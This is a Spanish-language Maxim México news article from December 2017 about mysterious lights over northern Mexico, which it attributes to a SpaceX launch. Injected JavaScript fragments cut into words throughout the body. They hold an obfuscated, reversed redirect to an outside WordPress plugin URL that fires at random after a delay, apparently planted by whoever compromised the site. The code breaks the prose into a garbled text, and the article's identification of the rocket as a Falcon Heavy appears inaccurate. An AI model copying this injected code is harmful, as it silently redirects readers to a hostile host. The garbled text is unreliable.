Estas extrañas luces en el norte de México enloquecieron las redes sociales | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Estas extrañas luces en el norte de México enloquecieron las redes sociales

    Y tal parece que tendremos que irnos acostumbrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a estas imágenes que inauguran una nueva era espacial.

    Autor: Redacción Maxim 23 diciembre, 2017



    Twitter @kellenrazano

     

    Viernes en la noche, víspera de la Navidad, aguinaldo. En medio de los festejos, comenzamos a ver este tipo de imágenes en los muros de nuestros contactoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de Tijuana y Sonora. Después vimos que era algo que estaba ocurriendo en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todo California. Ya era Trending Topic en Twitter y las redes sociales comenzaron a inundarse con estas imágenes y videos, acompañados de exclamaciones.

     

    Algunos pensaron que se trataba del fin del mundo, otros creyeron que era un misil de Corea del Norte, un meteoritoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, una bomba nuclear, una invasión alienígena y hasta Santa Claus.

     

    Poco a poco comenzó a fluir la información y ahora sabemos que se trata del lanzamientoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to del cohete Falcon Heavy de la compañía Space X de nuestro amigo el excéntrico empresario Elon Musk.

     

    Después de revelar la causa, a la compañía no le quedó de otra más que pedir que después del sustoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mejor comenzáramos a disfrutar de las imágenes. Y es que Elon Musk planea tener más de este tipo de lanzamientoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos e inaugurar una nueva era espacial.

     

    Así es que, a disfrutar las imágenes.

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Temas relacionados con esta nota: , , ,

Y tal parece que tendremos que irnos acostumbrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a estas imágenes que inauguran una nueva era espacial.